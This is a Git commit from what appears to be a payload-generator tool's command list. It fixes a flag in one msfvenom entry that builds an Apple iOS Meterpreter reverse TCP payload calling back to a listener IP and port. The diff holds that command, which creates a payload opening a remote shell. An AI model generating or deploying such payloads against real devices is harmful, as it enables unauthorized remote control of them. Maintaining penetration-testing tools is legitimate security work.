Changed -p to --platform

Redundant -p, meant to use --platform first.
This commit is contained in:
John Jackson 2023-02-04 16:50:43 -07:00 committed by GitHub
parent e4aa07eae8
commit 09e9c4ae50
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -455,7 +455,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "Apple iOS Meterpreter Reverse TCP Inline",
"command": "msfvenom -p apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
"command": "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
"meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
},
{